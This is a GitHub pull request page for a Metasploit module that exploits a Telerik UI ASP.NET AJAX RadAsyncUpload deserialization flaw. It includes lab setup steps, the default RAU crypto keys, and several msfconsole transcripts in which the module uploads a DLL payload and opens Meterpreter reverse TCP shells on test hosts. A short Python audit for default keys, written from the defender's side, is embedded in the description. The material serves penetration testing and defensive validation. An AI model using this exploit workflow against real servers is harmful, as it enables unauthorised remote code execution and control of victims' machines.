
Add exploit for Telerik UI ASP.NET AJAX RadAsyncUpload (RAU) Deserialization #14229

Merged
merged 11 commits into from
Oct 20, 2020

Conversation


@zeroSteiner zeroSteiner commented Oct 7, 2020

This adds an exploit for Telerik UI ASP.NET AJAX RadAsyncUpload (RAU) Deserialization which will upload and execute a payload file. For this exploit to work, it is necessary for the attacker to know the crypto keys and the target version. The default values of the crypto keys were disclosed in CVE-2017-11317 which this module checks for and reports. The target version can be enumerated if the crypto keys are correctly set, that is to say they are either the default values from CVE-2017-11317 or the attacker knows them through some means. With the ability to upload a file, an attacker can have it loaded by leveraging a JSON .NET deserialization flaw. Starting in version 2019.3.1023 the serialization types can be allow-listed through an opt-in feature, while starting in version 2020.1.114 the allow-list feature is enabled by default. In either case, the allow-list can be explicitly configured with the setting necessary for exploitation by this module for testing purposes. See the "Configuring Telerik UI ASP.NET AJAX" section of the module docs for more information.

Mixed Mode Assembly

To exploit the deserialization flaw, it's necessary to upload a DLL that can then be loaded. This DLL must be a Mixed Mode Assembly. I opted to create new templates for this located at data/templates/template_x##_windows_mixed_mode.dll. These new templates use the existing source code of the standard DLL template, and are compiled using Visual Studio 2019 Pro with the included batch script. This makes Mixed Mode Assembly DLLs that can be used for this exploit that are also compatible with Metasploit's existing DLL generation routine. There's a README file in the new source code directory with some additional information.

Verification

I tested this with Telerik UI ASP.NET AJAX version 2020.3.915 (the latest).

Testing Installation Steps
  1. Install the prerequisites
    • Internet Information Services (IIS)
    • Visual Studio 2019
    • SQL Server Express
  2. Download and install the trial version of "Telerik UI for ASP.NET AJAX"
    • Select Visual Studio 2019 Support and Local Demos
  3. Edit the web.config file to configure it to be vulnerable; these details are in the "Configuring Telerik UI ASP.NET AJAX" section of the module docs
  4. Edit the applicationhost.config file to expose the HTTP server on a hostname so Metasploit can reach it from a different machine
    • Under sites > site > bindings > binding, change "bindingInformation" from :####:localhost to :8080:HOSTNAME where HOSTNAME is the hostname of your machine (don't forget to set the VHOST option in Metasploit)
  5. Open the TelerikUI_for_AspNetAjax_Demos_VS2017.sln project file located in C:\Program Files (x86)\Progress\Telerik UI for ASP.NET AJAX R3 2020\Live Demos
    1. Use the green play button to run it in "Local IIS...". If there are build errors, select "Yes" to continue and run the last successful build.
  • Start msfconsole
  • Do: use exploit/windows/http/telerik_rau_deserialization
  • Set the RHOSTS and PAYLOAD options
  • Set any additional options as required by the previously selected payload
  • Optionally set the VHOST, RPORT and SSL options as appropriate
  • Set the VERSION option if it is known
  • Run the exploit

Example Output

msf6 > use exploit/windows/http/telerik_rau_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/telerik_rau_deserialization) > set RHOSTS 192.168.159.129
RHOSTS => 192.168.159.129
msf6 exploit(windows/http/telerik_rau_deserialization) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/telerik_rau_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(windows/http/telerik_rau_deserialization) > set VHOST win10dev
VHOST => win10dev
msf6 exploit(windows/http/telerik_rau_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/http/telerik_rau_deserialization) > check
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[*] 192.168.159.129:8080 - The service is running, but could not be validated.
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
msf6 exploit(windows/http/telerik_rau_deserialization) > set VERSION 2020.3.915
VERSION => 2020.3.915
msf6 exploit(windows/http/telerik_rau_deserialization) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/http/telerik_rau_deserialization) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 29184 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[*] Executing the payload...
[*] Sending stage (175174 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:49466) at 2020-10-07 10:44:31 -0400
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
meterpreter > getuid
Server username: WIN10DEV\smcintyre
meterpreter > sysinfo
Computer        : WIN10DEV
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
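As an added defender-side example (not code from this PR or from the Metasploit module), the following Python audit reads a web.config and reports whether the RAU keys are still the CVE-2017-11317 defaults shown in the module's options, and, given the installed Telerik version, whether the type allow-list described above is available, opt-in, or explicitly configured. The appSettings key names are assumed from Telerik's documentation and the sample web.config is constructed.

```python
import xml.etree.ElementTree as ET

# Default RAU key values disclosed in CVE-2017-11317 (the module's option defaults);
# the appSettings key names are assumed from Telerik's documentation.
DEFAULT_KEYS = {
    "Telerik.AsyncUpload.ConfigurationEncryptionKey":
        "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration",
    "Telerik.Upload.ConfigurationHashKey":
        "PrivateKeyForHashOfUploadConfiguration",
}
# Assumed appSettings key that configures the deserialization type allow-list.
ALLOWLIST_KEY = "Telerik.Upload.AllowedCustomMetaDataTypes"
ALLOWLIST_OPTIN_VERSION = (2019, 3, 1023)   # allow-list available, opt-in
ALLOWLIST_DEFAULT_VERSION = (2020, 1, 114)  # allow-list enabled by default

# Constructed sample: one key left at its default, the other not set at all.
SAMPLE_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey"
         value="PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" />
  </appSettings>
</configuration>"""

def parse_version(version):
    """Turn '2020.3.915' into the comparable tuple (2020, 3, 915)."""
    return tuple(int(part) for part in version.split("."))

def app_settings(web_config_xml):
    """Return {key: value} for every <add key=... value=...> element."""
    root = ET.fromstring(web_config_xml)
    return {e.get("key"): e.get("value") for e in root.iter("add") if e.get("key")}

def audit(web_config_xml, version):
    """Return a list of findings; an empty list means nothing to flag."""
    settings = app_settings(web_config_xml)
    findings = []
    for key, default in DEFAULT_KEYS.items():
        # An absent key means the product falls back to the known default.
        if settings.get(key, default) == default:
            findings.append(f"{key} is the CVE-2017-11317 default")
    v = parse_version(version)
    if v < ALLOWLIST_OPTIN_VERSION:
        findings.append("version predates the type allow-list; upgrade")
    elif v < ALLOWLIST_DEFAULT_VERSION and ALLOWLIST_KEY not in settings:
        findings.append("allow-list is opt-in for this version and not configured")
    elif ALLOWLIST_KEY in settings:
        findings.append(f"review {ALLOWLIST_KEY}: an explicit allow-list is in effect")
    return findings
```

Run `audit(SAMPLE_WEB_CONFIG, "2020.3.915")` to see the two default-key findings the module's check output above corresponds to.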

@wvu wvu self-assigned this Oct 7, 2020
@wvu wvu left a comment


Looks good, just a few things.


wvu commented Oct 20, 2020

Testing

Note that FileDropper fails to delete the created DLL, since it's still in use. The pathname is reported for manual deletion.

Deployed in IIS

msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              192.168.123.173                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               8080                                                  yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI           /                                                     yes       The base path to the web application
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST                                                                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\3Pb9Sh9m.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\3Pb9Sh9m.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.173
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.173:62907) at 2020-10-20 13:06:34 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\3Pb9Sh9m.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\3Pb9Sh9m.dll.tmp' on the target

meterpreter > getuid
Server username: IIS APPPOOL\Telerik UI for ASP.NET AJAX
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter >


Deployed in Visual Studio

A pivot was necessary to reach the ASP.NET Development Server.

msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              127.0.0.1                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               62942                                                 yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI           /TelerikUI_for_AspNetAjax                             yes       The base path to the web application
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST               localhost                                             no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.173
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.173:62995) at 2020-10-20 13:10:27 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp' on the target

meterpreter > getuid
Server username: GIBSON\Administrator
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter >


🚀

@wvu wvu merged commit 3970b69 into rapid7:master Oct 20, 2020

wvu commented Oct 20, 2020

Release Notes

New module exploits/windows/http/telerik_rau_deserialization targets Telerik UI for ASP.NET AJAX, leveraging CVE-2017-11317 and CVE-2019-18935 to gain RCE against vulnerable targets.

@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 28, 2020
@zeroSteiner zeroSteiner deleted the feat/cve-2019-18935 branch February 23, 2021 17:10